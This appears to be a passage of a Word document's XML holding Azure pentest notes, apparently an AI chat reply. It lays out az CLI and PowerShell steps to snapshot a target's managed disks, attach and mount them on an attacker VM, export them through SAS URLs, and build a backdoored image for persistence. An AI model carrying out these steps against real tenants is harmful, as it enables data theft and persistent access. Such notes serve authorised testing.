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1C01" w14:textId="77777777" w:rsidR="00F265C5" w:rsidRDefault="00F265C5" w:rsidP="00F265C5">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Azure Disks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62920B62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Here is the </w:t>
      </w:r>
      <w:r w:rsidRPr="000400F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>corrected, rewritten, and Azure-adapted version</w:t>
      </w:r>
      <w:r w:rsidRPr="000400F4">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> of your EBS-focused enumeration and exploitation notes—</w:t>
      </w:r>
      <w:r w:rsidRPr="000400F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>now in the context of Azure Penetration Testing</w:t>
      </w:r>
      <w:r w:rsidRPr="000400F4">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> with </w:t>
      </w:r>
      <w:r w:rsidRPr="000400F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Managed Disks and Snapshots</w:t>
      </w:r>
      <w:r w:rsidRPr="000400F4">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> as the target:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17CB9136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3B32B771">
          <v:rect id="_x0000_i1025" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="778E7997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🧱</w:t>
      </w:r>
      <w:r w:rsidRPr="000400F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Azure Disk Services (Equivalent to AWS EBS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FDB7FCE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Overview</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12C2D5AF" w14:textId="77777777" w:rsidR="00F265C5" w:rsidRPr="000400F4" w:rsidRDefault="00F265C5" w:rsidP="00F265C5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="166"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000400F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Azure Managed Disks</w:t>
      </w:r>
      <w:r w:rsidRPr="000400F4">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> are block storage volumes used with Azure Virtual Machines.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="578C57DD" w14:textId="77777777" w:rsidR="00F265C5" w:rsidRPr="000400F4" w:rsidRDefault="00F265C5" w:rsidP="00F265C5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="166"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000400F4">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Disks can be attached/detached like hard drives.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E13A974" w14:textId="77777777" w:rsidR="00F265C5" w:rsidRPr="000400F4" w:rsidRDefault="00F265C5" w:rsidP="00F265C5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="166"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000400F4">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Disks can be backed up as </w:t>
      </w:r>
      <w:r w:rsidRPr="000400F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Snapshots</w:t>
      </w:r>
      <w:r w:rsidRPr="000400F4">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> or converted into </w:t>
      </w:r>
      <w:r w:rsidRPr="000400F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Images</w:t>
      </w:r>
      <w:r w:rsidRPr="000400F4">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13589DC3" w14:textId="77777777" w:rsidR="00F265C5" w:rsidRPr="000400F4" w:rsidRDefault="00F265C5" w:rsidP="00F265C5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="166"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000400F4">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>A malicious actor with the proper IAM permissions can exfiltrate data from these snapshots by creating a new disk and attaching it to a controlled VM.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49A8F46B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23B43954">
          <v:rect id="_x0000_i1026" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="71B577A6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Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59BBFFC8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All Managed Disks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C508BD4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disk list -o table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5910F445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Check if a Disk is Encrypted</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A77D401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disk show --name &lt;disk_name&gt; --resource-group &lt;rg&gt; --query 'encryption'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="620D1B81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All Snapshots</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BE5087E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snapshot list -o table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C83A171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Check if a Snapshot is Encrypted</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30D53375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snapshot show --name &lt;snapshot_name&gt; --resource-group &lt;rg&gt; --query 'encryption'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E23ED50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540805BC">
          <v:rect id="_x0000_i1027" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4353FFC9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💥</w:t>
      </w:r>
      <w:r w:rsidRPr="000400F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Exploitation &amp; Data Exfiltration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0888A740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📌</w:t>
      </w:r>
      <w:r w:rsidRPr="000400F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Prerequisites:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D8504EF" w14:textId="77777777" w:rsidR="00F265C5" w:rsidRPr="000400F4" w:rsidRDefault="00F265C5" w:rsidP="00F265C5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="167"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000400F4">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Role with permission to read disks and snapshots (Microsoft.Compute/disks/*, Microsoft.Compute/snapshots/*).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="731B37FC" w14:textId="77777777" w:rsidR="00F265C5" w:rsidRPr="000400F4" w:rsidRDefault="00F265C5" w:rsidP="00F265C5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="167"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000400F4">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Permissions to create and attach disks to VMs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="763FC5CA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52D0DC4E">
          <v:rect id="_x0000_i1028" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0793D158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Step-by-Step Exploitation Workflow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CD2D34B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1️⃣ Create a Snapshot from a Target Disk</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F00B22C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snapshot create \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68C0183A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--resource-group &lt;target_rg&gt; \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C6E4589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--source &lt;target_disk_id&gt; \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D6E51CB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--name &lt;new_snapshot_name&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C4494FD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2️⃣ Create a New Disk from the Snapshot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E14893F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disk create \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54E21FD6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--resource-group &lt;attacker_rg&gt; \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01EC2871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--name &lt;new_disk_name&gt; \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BD82667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--source &lt;snapshot_id&gt; \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E4635D5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--location &lt;region&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="368BF2E3" w14:textId="77777777" w:rsidR="00F265C5" w:rsidRPr="000400F4" w:rsidRDefault="00F265C5" w:rsidP="00F265C5">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000400F4">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>⚠️</w:t>
      </w:r>
      <w:r w:rsidRPr="000400F4">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Must be in the </w:t>
      </w:r>
      <w:r w:rsidRPr="000400F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>same region</w:t>
      </w:r>
      <w:r w:rsidRPr="000400F4">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> as the target VM to attach!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31F1C562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3️⃣ Attach the New Disk to an Attacker-Controlled VM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="232E0F0E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vm disk attach \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39044662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lastRenderedPageBreak/>
        <w:t xml:space="preserve">  --resource-group &lt;rg&gt; \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="740CDD36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--vm-name &lt;vm_name&gt; \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C8F68FD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--name &lt;new_disk_name&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14BB7BDE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4️⃣ Mount the Disk Inside the VM (Linux Example)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="778BB1D6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On the attacker-controlled VM:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="453255CE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sudo fdisk -l                # Identify new disk (e.g., /dev/sdc)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37128B71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sudo mkdir /mnt/loot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D7C2C17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sudo mount /dev/sdc1 /mnt/loot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FB4577A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You now have access to the exfiltrated disk data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="448CDD74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31A08277">
          <v:rect id="_x0000_i1029" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B1887F9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🔁</w:t>
      </w:r>
      <w:r w:rsidRPr="000400F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Alternative Exploitation Scenarios</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27255DAF" w14:textId="77777777" w:rsidR="00F265C5" w:rsidRPr="000400F4" w:rsidRDefault="00F265C5" w:rsidP="00F265C5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="168"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000400F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Read but no login access:</w:t>
      </w:r>
      <w:r w:rsidRPr="000400F4">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> If you can't access the original VM but can create snapshots, you can still steal data by attaching snapshots to another VM.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F87D0B9" w14:textId="77777777" w:rsidR="00F265C5" w:rsidRPr="000400F4" w:rsidRDefault="00F265C5" w:rsidP="00F265C5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="168"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000400F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Lateral movement:</w:t>
      </w:r>
      <w:r w:rsidRPr="000400F4">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Enumerate and attach disks from other resource groups if cross-RG privileges are present.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="785F345A" w14:textId="77777777" w:rsidR="00F265C5" w:rsidRPr="000400F4" w:rsidRDefault="00F265C5" w:rsidP="00F265C5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="168"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000400F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Bypass:</w:t>
      </w:r>
      <w:r w:rsidRPr="000400F4">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Use snapshot+image to create a new VM (if allowed) to maintain persistence.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77685727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75B9D8CF">
          <v:rect id="_x0000_i1030" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="78E47A1C" w14:textId="77777777" w:rsidR="00F265C5" w:rsidRPr="000400F4" w:rsidRDefault="00F265C5" w:rsidP="00F265C5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🛡️</w:t>
      </w:r>
      <w:r w:rsidRPr="000400F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Persistence Tactic (Optional)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="702D899E" w14:textId="77777777" w:rsidR="00F265C5" w:rsidRPr="000400F4" w:rsidRDefault="00F265C5" w:rsidP="00F265C5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="169"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000400F4">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Create a </w:t>
      </w:r>
      <w:r w:rsidRPr="000400F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>new image</w:t>
      </w:r>
      <w:r w:rsidRPr="000400F4">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> from a snapshot with your own backdoor or beacon.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E055F92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az image create \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F30308A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--resource-group &lt;rg&gt; \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06C3096F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--name &lt;malicious_image_name&gt; \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="034D9F00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 xml:space="preserve">  --source &lt;snapshot_id&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53D974E7" w14:textId="77777777" w:rsidR="00F265C5" w:rsidRPr="000400F4" w:rsidRDefault="00F265C5" w:rsidP="00F265C5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="170"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000400F4">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Deploy future VMs from this backdoored image.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58669AB6" w14:textId="77777777" w:rsidR="00F265C5" w:rsidRPr="000400F4" w:rsidRDefault="00000000" w:rsidP="00F265C5">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:pict w14:anchorId="75BF6546">
          <v:rect id="_x0000_i1031" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="734A0BF6" w14:textId="77777777" w:rsidR="00F265C5" w:rsidRPr="000400F4" w:rsidRDefault="00F265C5" w:rsidP="00F265C5">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000400F4">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Would you like this formatted into a full Azure PenTest playbook PDF or Markdown file for quick reference?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AB9C005" w14:textId="77777777" w:rsidR="00F265C5" w:rsidRDefault="00F265C5" w:rsidP="00F265C5">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43087022" w14:textId="77777777" w:rsidR="00F265C5" w:rsidRDefault="00F265C5" w:rsidP="00F265C5">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00946D3E">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Export Disk Through SAS URL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35C2ACFB" w14:textId="77777777" w:rsidR="00F265C5" w:rsidRPr="00946D3E" w:rsidRDefault="00F265C5" w:rsidP="00F265C5">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidRPr="00946D3E">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">echnique </w:t>
      </w:r>
      <w:r w:rsidRPr="00946D3E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>"Export Disk Through SAS URL"</w:t>
      </w:r>
      <w:r w:rsidRPr="00946D3E">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> for an Azure Penetration Testing context:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0872F0DA" w14:textId="77777777" w:rsidR="00F265C5" w:rsidRPr="00946D3E" w:rsidRDefault="00F265C5" w:rsidP="00F265C5">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C8EA29A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💿</w:t>
      </w:r>
      <w:r w:rsidRPr="00946D3E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Export Azure Managed Disk via SAS URL (Forensic Imaging / Data Exfiltration)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4700CBC1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🛠️</w:t>
      </w:r>
      <w:r w:rsidRPr="00946D3E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Use Case:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="049594D7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If the attacker has </w:t>
      </w:r>
      <w:r w:rsidRPr="00946D3E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Contributor</w:t>
      </w:r>
      <w:r w:rsidRPr="00946D3E">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidRPr="00946D3E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Disk-level RBAC</w:t>
      </w:r>
      <w:r w:rsidRPr="00946D3E">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> on an Azure VM or its disk, they can export the OS or data disk using a </w:t>
      </w:r>
      <w:r w:rsidRPr="00946D3E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Shared Access Signature (SAS)</w:t>
      </w:r>
      <w:r w:rsidRPr="00946D3E">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> URL. This enables downloading the full VHD file for offline analysis or lateral movement.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="797BBAE4" w14:textId="77777777" w:rsidR="00F265C5" w:rsidRPr="00946D3E" w:rsidRDefault="00F265C5" w:rsidP="00F265C5">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1ABDC546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🔹</w:t>
      </w:r>
      <w:r w:rsidRPr="00946D3E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> [CLI] Generate SAS URL for a Managed Disk</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D45DF6C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az disk grant-access \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C993FFF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--resource-group &lt;resource-group-name&gt; \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E390CF4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--name &lt;disk-name&gt; \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DB2B51A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--duration-in-seconds &lt;duration-seconds&gt; \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BDA4C5D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--access-level Read \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20B03BD1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--query 'accessSas' -o tsv</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23F384F6" w14:textId="77777777" w:rsidR="00F265C5" w:rsidRPr="00946D3E" w:rsidRDefault="00F265C5" w:rsidP="00F265C5">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00946D3E">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="00946D3E">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00946D3E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Result</w:t>
      </w:r>
      <w:r w:rsidRPr="00946D3E">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>: A time-limited URL (with .vhd extension) which can be used to download the disk.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5040A882" w14:textId="77777777" w:rsidR="00F265C5" w:rsidRPr="00946D3E" w:rsidRDefault="00F265C5" w:rsidP="00F265C5">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B8D6695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🔹</w:t>
      </w:r>
      <w:r w:rsidRPr="00946D3E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> [PowerShell] Generate SAS URL (Alternative)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AA5366C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$disk = Get-AzDisk -ResourceGroupName "&lt;resource-group-name&gt;" -DiskName "&lt;disk-name&gt;"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F25B457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$sasToken = Grant-AzDiskAccess -DiskId $disk.Id -AccessLevel Read -DurationInSecond &lt;duration-seconds&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34841EAF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$diskUrl = $disk.DiskUri + $sasToken.AccessSAS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B99F870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$diskUrl</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CDCCADC" w14:textId="77777777" w:rsidR="00F265C5" w:rsidRPr="00946D3E" w:rsidRDefault="00F265C5" w:rsidP="00F265C5">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D5F4285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🔹</w:t>
      </w:r>
      <w:r w:rsidRPr="00946D3E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> [Terraform] Automate Export via SAS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A87D808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Terraform module snippet:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4877A484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resource "azurerm_managed_disk" "target_disk" {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30EF2E4D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name                 = "target-disk"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62D00B59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resource_group_name  = var.resource_group</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62504B31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location             = var.location</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D618C4A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storage_account_type = "Standard_LRS"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="624FC587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create_option        = "Import"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2959B34C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  source_uri           = var.source_vhd_url</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7140299F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>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4589AFBF" w14:textId="77777777" w:rsidR="00F265C5" w:rsidRPr="00946D3E" w:rsidRDefault="00F265C5" w:rsidP="00F265C5">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00946D3E">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Optional automation to </w:t>
      </w:r>
